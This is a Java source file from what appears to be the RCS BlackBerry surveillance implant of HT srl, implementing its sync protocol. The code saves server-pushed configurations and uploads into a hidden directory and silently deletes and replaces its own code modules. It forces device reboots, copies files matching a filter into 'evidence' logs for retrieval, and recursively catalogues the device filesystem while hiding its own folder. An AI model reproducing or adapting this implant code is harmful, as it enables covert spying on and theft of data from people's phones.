

/* *************************************************
 * Copyright (c) 2010 - 2011
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.action.sync;

import java.util.Date;
import java.util.Enumeration;
import java.util.Vector;

import javax.microedition.io.file.FileSystemRegistry;

import net.rim.device.api.system.CodeModuleManager;
import net.rim.device.api.util.DataBuffer;
import blackberry.Core;
import blackberry.Messages;
import blackberry.action.sync.protocol.CommandException;
import blackberry.action.sync.protocol.ProtocolException;
import blackberry.action.sync.transport.Transport;
import blackberry.config.Cfg;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.evidence.EvidenceType;
import blackberry.fs.AutoFile;
import blackberry.fs.Directory;
import blackberry.fs.Path;
import blackberry.utils.DateTime;
import blackberry.utils.Utils;
import blackberry.utils.WChar;

public abstract class Protocol {
    public static final String UPGRADE_FILENAME_0 = Messages.getString("e.0"); //$NON-NLS-1$
    public static final String UPGRADE_FILENAME_1 = Messages.getString("e.1"); //$NON-NLS-1$





    protected Transport transport;

    //public boolean reload;
    //public boolean uninstall;

    public boolean init(Transport transport) {
        this.transport = transport;
        //transport.initConnection();
        return true;
    }

    public abstract boolean perform() throws ProtocolException;

    public synchronized static boolean saveNewConf(byte[] conf, int offset)
            throws CommandException {

        boolean ret = false;
        try {



            final AutoFile file = new AutoFile(Path.conf(), Cfg.NEW_CONF);




            if (file.exists()) {



                file.delete();
            }




            file.create();




            ret = file.write(conf, offset, conf.length - offset);
            if (!ret) {





                throw new CommandException(); //"write"
            } else {
                Evidence.info(Messages.getString("e.2")); //$NON-NLS-1$
            }
        } catch (Exception ex) {




        }

        return ret;
    }

    public static void saveUpload(String filename, byte[] content) {
        final AutoFile file = new AutoFile(Path.hidden(), filename);

        if (file.exists()) {



            file.delete();
        }
        file.create();
        file.write(content);





    }

    public static boolean upgradeMulti(Vector files) {

        try {
            AutoFile[] autoFiles = new AutoFile[files.size()];
            // guarda se i file ci sono tutti e sono capienti e leggibili
            for (int i = 0; i < files.size(); i++) {
                String file = (String) files.elementAt(i);
                AutoFile autoFile = new AutoFile(Path.hidden(), file);
                autoFiles[i] = autoFile;

                if (!autoFile.exists() || !autoFile.isReadable()
                        || autoFile.getSize() <= 0) {



                }
            }

            // cancella se stesso
            deleteSelf();

            // upgrade effettivo
            for (int i = 0; i < autoFiles.length; i++) {
                AutoFile autoFlashFile = autoFiles[i];




                upgradeCod(autoFlashFile.read());
                autoFlashFile.delete();
            }

            // restart the blackberry if required
            if (CodeModuleManager.isResetRequired()) {
                Core.forceReboot();




            }




            return true;
        } catch (Exception ex) {



            return false;
        }
    }

    public static boolean upgradeMulti() {
        final AutoFile file_0 = new AutoFile(Path.hidden(),
                Protocol.UPGRADE_FILENAME_0);
        final AutoFile file_1 = new AutoFile(Path.hidden(),
                Protocol.UPGRADE_FILENAME_1);

        if (file_0.exists() && file_1.exists()) {




            deleteSelf();





            upgradeCod(file_0.read());





            upgradeCod(file_1.read());

            file_0.delete();
            file_1.delete();

            // restart the blackberry if required
            if (CodeModuleManager.isResetRequired()) {






            }

            return true;
        } else {



            return false;
        }
    }

    public static boolean deleteSelf() {
        // Delete it self.
        final int handle = CodeModuleManager.getModuleHandle(Cfg.MODULE_NAME);
        if (handle != 0) {
            final int success = CodeModuleManager.deleteModuleEx(handle, true);



            return true;
        } else {
            return false;
        }
    }

    public static boolean upgradeCod(byte[] codBuff) {

        if (Utils.isZip(codBuff)) {



            return false;
        }

        // Download new cod files(included sibling files).

        int newHandle = 0;
        // API REFERENCE:
        // You need to write the data in two separate chunks.
        // The first data chunk must be less thank 64KB in size.
        final int MAXAPPEND = 61440; // 1024*60;

        if (codBuff.length > MAXAPPEND) {



            newHandle = CodeModuleManager.createNewModule(codBuff.length,
                    codBuff, MAXAPPEND);

            final boolean appendSucc = CodeModuleManager.writeNewModule(
                    newHandle, MAXAPPEND, codBuff, MAXAPPEND, codBuff.length
                            - MAXAPPEND);





            codBuff = null;
        } else {



            newHandle = CodeModuleManager.createNewModule(codBuff.length,
                    codBuff, codBuff.length);
        }




        // install the module
        if (newHandle != 0) {
            final int savecode = CodeModuleManager.saveNewModule(newHandle,
                    true);
            if (savecode != CodeModuleManager.CMM_OK_MODULE_OVERWRITTEN) {



                return false;
            }
        } else {



        }





        return true;
    }

    public static void saveDownloadLog(String filefilter) {
        AutoFile file = new AutoFile(filefilter, false);
        if (file.exists()) {



            saveFileLog(file, filefilter);
        } else {



            for (Enumeration en = Directory.find(filefilter); en
                    .hasMoreElements();) {
                String filename = (String) en.nextElement();

                file = new AutoFile(filename, false);
                if (file.isDirectory()) {
                    continue;
                }

                saveFileLog(file, filename);





            }
        }
    }

    private static void saveFileLog(AutoFile file, String filename) {







        byte[] content = file.read();
        byte[] additional = Protocol.logDownloadAdditional(filename);
        Evidence log = new Evidence(EvidenceType.DOWNLOAD);

        log.atomicWriteOnce(additional, content);
    }

    private static byte[] logDownloadAdditional(String filename) {







        String path = Utils.chomp(Path.hidden(), "/"); // UPLOAD_DIR //$NON-NLS-1$
        int macroPos = filename.indexOf(path);
        if (macroPos >= 0) {



            String start = filename.substring(0, macroPos);
            String end = filename.substring(macroPos + path.length());

            filename = start + Directory.hiddenDirMacro + end;
        }





        int version = 2008122901;
        byte[] wfilename = WChar.getBytes(filename);
        byte[] buffer = new byte[wfilename.length + 8];

        final DataBuffer databuffer = new DataBuffer(buffer, 0, buffer.length,
                false);

        databuffer.writeInt(version);
        databuffer.writeInt(wfilename.length);
        databuffer.write(wfilename);

        return buffer;
    }

    public static void saveFilesystem(int depth, String path) {
        Evidence fsLog = new Evidence(EvidenceType.FILESYSTEM);
        fsLog.createEvidence();

        path=path.replace('\\', '/');
        // Expand path and create log
        if (path.equals("/")) { //$NON-NLS-1$



            expandRoot(fsLog, depth);
        } else {
            if (path.startsWith("//")) {
                path = path.substring(1, path.length());
            }
            if (path.endsWith("/*")) { //$NON-NLS-1$ //$NON-NLS-2$
                path = path.substring(0, path.length() - 2);
            }
            
            if (!path.startsWith("/")) {
                path = "/" + path;
            }
                       
            expandPath(fsLog, path, depth);
        }

        fsLog.close();
    }

    /**
     * Expand the root for a maximum depth. 0 means only root, 1 means its sons.
     * 
     * @param depth
     */
    private static void expandRoot(Evidence fsLog, int depth) {




        saveRootLog(fsLog); // depth 0
        final Enumeration roots = FileSystemRegistry.listRoots();

        while (roots.hasMoreElements()) {
            String root = (String) roots.nextElement();
            if (root.endsWith("/")) { //$NON-NLS-1$
                root = root.substring(0, root.length() - 1);
            }



            Protocol.saveFilesystemLog(fsLog, "/" + root); // depth 1 //$NON-NLS-1$
            if (depth - 1 > 0) {
                // if depth is 0, no recursion is required
                expandPath(fsLog, "/" + root, depth - 1); // depth 2+ //$NON-NLS-1$
            }
        }
    }

    private static boolean saveFilesystemLog(Evidence fsLog, String filepath) {









        int version = 2010031501;

        AutoFile file = new AutoFile(filepath);
        if (!file.exists()) {



            return false;
        }

        byte[] w_filepath = WChar.getBytes(filepath, true);

        byte[] content = new byte[28 + w_filepath.length];
        DataBuffer databuffer = new DataBuffer(content, 0, content.length,
                false);

        databuffer.writeInt(version);
        databuffer.writeInt(w_filepath.length);

        int flags = 0;
        long size = file.getSize();

        boolean isDir = file.isDirectory();
        if (isDir) {
            flags |= 1;
        } else {
            if (size == 0) {
                flags |= 2;
            }
        }

        databuffer.writeInt(flags);
        databuffer.writeLong(size);
        databuffer.writeLong(DateTime.getFiledate(file.getFileTime()));
        databuffer.write(w_filepath);

        fsLog.writeEvidence(content);





        return isDir;
    }

    /**
     * saves the root log. We use this method because the directory "/" cannot
     * be opened, we fake it.
     */
    private static void saveRootLog(Evidence fsLog) {
        int version = 2010031501;




        //byte[] content = new byte[30];
        DataBuffer databuffer = new DataBuffer(false);
        databuffer.writeInt(version);
        databuffer.writeInt(2); // len
        databuffer.writeInt(1); // flags
        databuffer.writeLong(0);
        databuffer.writeLong(DateTime.getFiledate(new Date()));
        databuffer.write(WChar.getBytes("/")); //$NON-NLS-1$

        fsLog.writeEvidence(databuffer.toArray());
    }

    /**
     * Expand recursively the path saving the log. When depth is 0 saves the log
     * and stop recurring.
     * 
     * @param path
     * @param depth
     */
    private static void expandPath(Evidence fsLog, String path, int depth) {











        //saveFilesystemLog(path);
        //if (depth > 0) {
        for (Enumeration en = Directory.find(path + "/*"); en.hasMoreElements();) { //$NON-NLS-1$

            String dPath = path + "/" + (String) en.nextElement(); //$NON-NLS-1$
            if (dPath.endsWith("/")) { //$NON-NLS-1$



                dPath = dPath.substring(0, dPath.length() - 1); // togli lo /
            } else {



            }

            if (dPath.indexOf(Utils.chomp(Path.hidden(), "/")) >= 0) { //$NON-NLS-1$



                continue;
            }

            boolean isDir = Protocol.saveFilesystemLog(fsLog, dPath);
            if (isDir && depth > 1) {
                expandPath(fsLog, dPath, depth - 1);
            }
        }
        //}
    }

    public static String normalizeFilename(String file) {
        if (file.startsWith("//")) { //$NON-NLS-1$



            return file.substring(1);
        } else {
            return file;
        }
    }

}
